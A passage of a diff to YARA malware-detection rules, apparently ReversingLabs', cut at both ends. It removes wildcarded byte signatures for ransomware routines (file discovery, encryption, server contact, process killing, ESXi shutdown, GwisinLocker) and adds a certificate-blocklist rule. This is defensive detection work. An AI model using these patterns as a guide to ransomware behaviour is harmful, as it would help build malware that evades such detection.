?? FC 8B 08 89 0F 8B 48 ?? 89 4F ?? - E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B - 54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 54 24 ?? 89 54 24 ?? 89 4C - 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B - 5C 24 ?? 89 5C 24 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 - } - $get_files_for_encryption_64 = { - 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 - EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 0F B6 44 24 ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 - ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 - ?? 48 89 0C 24 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? - 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? - ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0D ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 84 C9 0F 85 - ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 - 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 04 24 - 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? - ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B - 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 48 - 8D 0D ?? ?? ?? ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 0F 0B 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? - ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9 - } - $attach_to_server_64 = { - 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 - EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? - ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 89 - 7C 24 ?? 84 07 0F 57 C0 48 83 C7 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 - 8B 6D ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 - 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D ?? ?? ?? ?? 48 89 4C - 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D - ?? ?? ?? ?? 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? - 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? - ?? 48 8B 44 24 ?? 48 8B 48 ?? 48 8B 10 48 8B 58 ?? 48 8B 40 ?? 48 39 CB 0F 87 ?? ?? - ?? ?? 48 29 D9 48 29 D8 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 01 DA - 48 89 54 24 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C - 24 ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B - 48 ?? 48 8B 50 ?? 84 01 48 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 48 83 C1 ?? 48 89 4C 24 - ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 - 24 ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 - 24 ?? 48 8B 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B - 4C 24 ?? 48 8B 54 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 - 54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 44 24 ?? 48 89 8C 24 ?? - ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 48 8B 6C - 24 ?? 48 83 C4 ?? C3 31 DB E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9 - } - $encrypt_file_64 = { - 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 - EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 - 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 89 04 24 48 - 89 4C 24 ?? 48 89 54 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 - 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 - 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 89 1C 24 48 8B 5C 24 ?? 48 89 5C 24 ?? - 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8B 6C 24 ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? E9 - } - condition: - uint16(0)==0x5A4D and (($get_files_for_encryption_32 and $encrypt_file_32 and $attach_to_server_32) or ($get_files_for_encryption_64 and $encrypt_file_64 and $attach_to_server_64)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="33:41:21:68:ee:b3:c0:e4:c7:dd:05:08:a9:ff:ec:d5" and 1467590400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Ransomware_Gwisinlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE { meta: - description = "Yara rule that detects GwisinLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9f00e1b4-3692-5824-b614-724073532c1f" - date = "2022-10-11" - modified = "2022-10-11" + id = "002e344e-a073-5d00-9488-d73fad51c66a" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Linux.Ransomware.GwisinLocker.yara#L1-L354" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c23c0b73bbefbd644ffe1398e1f14eec3a89945cb3c3ccbc6f46c57046b53505" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16962-L16978" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7366e5064a9a9f66260730575327e404eadea096ba3f6cf28c83c47bef9bca58" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GwisinLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $init_key_v1 = { - 55 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 74 24 ?? 56 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 31 FF 83 EC ?? 56 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 - F8 5B 5E 5F 5D C3 66 90 31 D2 31 C0 89 54 04 ?? 83 C0 ?? 83 F8 ?? 72 ?? 83 EC ?? 8D - 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C5 8D 7C 24 ?? 85 - C0 74 ?? 50 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 89 2C 24 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? - 6A ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? 83 EC ?? 8D 44 - 24 ?? 50 FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? FF B3 - ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 56 FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 - 0F 94 C0 0F B6 C0 89 C7 E9 - } - $encrypt_files_v1_p1 = { - 55 B9 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8B 84 - 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 83 EC ?? 89 44 24 ?? 89 - C7 31 C0 F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 89 44 - 24 ?? 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? 31 FF 83 EC ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 - ?? ?? ?? ?? 58 5A 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 59 5E 6A ?? FF 74 24 ?? E8 ?? ?? - ?? ?? 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 83 EC ?? 6A ?? 8D 84 24 - ?? ?? ?? ?? 89 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 89 74 24 ?? - 85 C0 74 ?? 83 EC ?? 6A ?? FF 74 24 ?? 56 E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 59 5E 50 - 89 C5 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F 84 ?? - ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 89 C7 FF B4 24 ?? - ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 01 FA 89 D0 8B 54 - 24 ?? 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? 8B 94 24 ?? ?? ?? ?? - C6 44 3A ?? ?? BF ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? - ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 39 C1 B9 ?? ?? ?? ?? 19 D1 7D ?? 83 EC ?? FF B4 24 - ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? FF 74 - 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 83 EC ?? 56 E8 ?? ?? ?? - ?? 58 5A 55 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F - } - $encrypt_files_v1_p2 = { - 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 8B 74 24 - ?? 8B 7C 24 ?? 89 D1 89 74 24 ?? 89 7C 24 ?? 83 C4 ?? 39 F0 19 F9 7D ?? 89 44 24 ?? - 89 54 24 ?? 8B 7C 24 ?? 8B 74 24 ?? 89 F9 89 F5 C1 F9 ?? 89 C8 89 4C 24 ?? 31 CD 8B - 74 24 ?? C1 F8 ?? 89 44 24 ?? 89 E8 29 F0 8B 74 24 ?? 89 C7 83 E7 ?? 31 CF 89 F8 8B - 7C 24 ?? 29 F0 8B 74 24 ?? 89 FA 19 FA 8B 7C 24 ?? 29 C6 89 74 24 ?? 19 D7 83 EC ?? - 89 7C 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? - B9 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 31 C0 F3 AB 89 94 24 ?? ?? ?? ?? 56 6A ?? FF 74 - 24 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 83 - EC ?? FF 74 24 ?? E8 ?? ?? ?? ?? 5F 5D FF B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B 54 24 ?? 31 FF 8B 44 24 ?? - 89 7C 24 ?? 89 74 24 ?? 8D 74 24 ?? 89 D7 89 74 24 ?? 8D B3 ?? ?? ?? ?? 09 C7 89 74 - } - $encrypt_files_v1_p3 = { - 24 ?? 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 89 4C 24 ?? EB ?? 66 90 83 EC ?? 31 - ED FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF 74 24 ?? FF 74 - 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 31 D2 6A ?? 8B 84 24 ?? ?? ?? ?? 52 F7 D8 - 50 57 E8 ?? ?? ?? ?? 57 FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 44 24 ?? 8B BC 24 ?? ?? ?? ?? 8B 54 24 ?? 29 F8 19 EA 89 44 24 ?? 89 D6 89 54 - 24 ?? 83 C4 ?? 09 C6 74 ?? 39 84 24 ?? ?? ?? ?? 89 E9 8B 7C 24 ?? 19 D1 0F 4C 84 24 - ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? - ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 57 - FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 84 24 ?? - ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 EC ?? BF ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 - ?? E9 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? E9 - } - $find_files_v1_p1 = { - 55 89 C5 57 E8 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 54 24 ?? 8B - B4 24 ?? ?? ?? ?? 89 7C 24 ?? 89 FB 89 4C 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 85 C0 74 ?? 8D 58 ?? 80 7C 05 ?? ?? 0F 45 D8 89 5C 24 ?? - 8B BC 24 ?? ?? ?? ?? 83 E7 ?? 74 ?? 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B - 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 - ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D - B4 26 ?? ?? ?? ?? 66 90 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B 5C 24 ?? E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 78 ?? 8B 84 24 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 44 24 ?? ?? 31 FF C7 44 24 ?? - ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? F6 84 24 ?? ?? ?? ?? ?? 74 ?? 85 F6 0F 84 ?? ?? - ?? ?? 8B 4E ?? 8B 5E ?? 31 D1 31 C3 09 CB 0F 84 ?? ?? ?? ?? 31 FF 81 C4 ?? ?? ?? ?? - 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 8B 5C 24 ?? E8 ?? ?? ?? ?? 89 C7 8B 00 83 F8 ?? - 0F 85 ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 55 6A ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? - ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 46 ?? 8B 4C 24 - ?? 83 C0 ?? 83 C1 ?? 89 44 24 ?? 89 44 24 ?? 8B 46 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 - } - $find_files_v1_p2 = { - 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B - 84 24 ?? ?? ?? ?? 83 E0 ?? 89 44 24 ?? 75 ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? - 55 8B 44 24 ?? FF D0 89 C7 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 74 ?? 8B 84 24 ?? - ?? ?? ?? 8B 5C 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 8B BC 24 ?? ?? ?? ?? 89 C5 EB ?? 8D B6 - ?? ?? ?? ?? 8B 36 85 F6 74 ?? 8B 46 ?? 8B 56 ?? 31 D8 31 CA 09 C2 75 ?? 8B 46 ?? 8B - 56 ?? 31 E8 31 FA 09 C2 0F 84 ?? ?? ?? ?? 8B 36 85 F6 75 ?? 8B 6C 24 ?? 8B 7C 24 ?? - 85 FF 74 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? C6 44 05 ?? ?? 8B 44 24 ?? - 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? 55 8B 44 24 ?? FF D0 - 83 C4 ?? 89 C7 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 66 90 83 EC ?? 6A ?? 55 8B 5C - 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8B 00 89 44 24 ?? - 83 C4 ?? 85 FF 79 ?? 83 F8 ?? 0F B6 4C 24 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? - ?? ?? 0F 44 44 24 ?? 0F 45 CA 89 44 24 ?? 88 4C 24 ?? 8B 44 24 ?? 85 C0 0F 85 ?? ?? - ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D B4 - 26 ?? ?? ?? ?? 8D 76 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 48 ?? 89 4C 24 ?? 89 4C 24 ?? 85 C0 74 ?? 80 7C 05 - ?? ?? 74 ?? E9 ?? ?? ?? ?? 8D 76 ?? 80 7C 05 ?? ?? 0F 85 ?? ?? ?? ?? 83 E8 ?? 75 ?? - 31 D2 89 54 24 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 - } - $find_files_v1_p3 = { - 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? E9 ?? ?? ?? ?? 90 - 8B 84 24 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? 83 E0 ?? 83 F8 ?? 19 C0 83 E0 ?? - 83 C0 ?? 89 44 24 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 90 8B 74 24 ?? 85 F6 0F 88 - ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F - 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 44 24 ?? 89 44 24 ?? 8D B4 26 ?? ?? ?? ?? 8D 76 ?? - 83 EC ?? 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 78 ?? ?? - 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 78 ?? 57 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B 44 24 - ?? 0F 83 ?? ?? ?? ?? 8B 44 24 ?? 83 EC ?? C6 44 05 ?? ?? 57 8B 44 24 ?? 01 E8 50 8B - 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 5A 5B 8D 48 ?? 8D 44 24 ?? 50 89 E8 FF B4 24 ?? - ?? ?? ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 89 C7 - 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 0F 84 ?? ?? - ?? ?? 66 83 78 ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 80 7C 05 ?? - ?? 8D 48 ?? 89 C2 0F 84 ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 80 7C 05 ?? ?? 8D 50 ?? - 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 66 90 89 C2 85 D2 0F 84 ?? ?? ?? ?? 80 7C - 15 ?? ?? 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? - 31 FF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC ?? 56 8B 5C 24 ?? - E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 FB BF ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 00 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? - ?? ?? ?? BF - } - $kill_processes_v1_p1 = { - 55 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 E9 56 53 E8 ?? ?? ?? ?? 81 C3 - ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 66 89 54 24 ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 - ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? - C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 8B 83 ?? ?? ?? ?? - 89 44 24 ?? 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? F3 A5 8D B4 24 ?? ?? ?? ?? C6 44 - } - $kill_processes_v1_p2 = { - 24 ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 F7 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 CD C7 44 24 ?? ?? ?? - ?? ?? B9 ?? ?? ?? ?? 89 E8 F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? - ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? - ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 - B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 - 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 - 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? - ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 89 34 - 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D - 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? - F3 AB FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? - 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 - } - $shut_down_esxi_v1 = { - 55 B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 C1 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 - EC ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? 65 73 78 63 C7 44 24 ?? 6C 69 20 76 C7 44 24 - ?? 6D 20 70 72 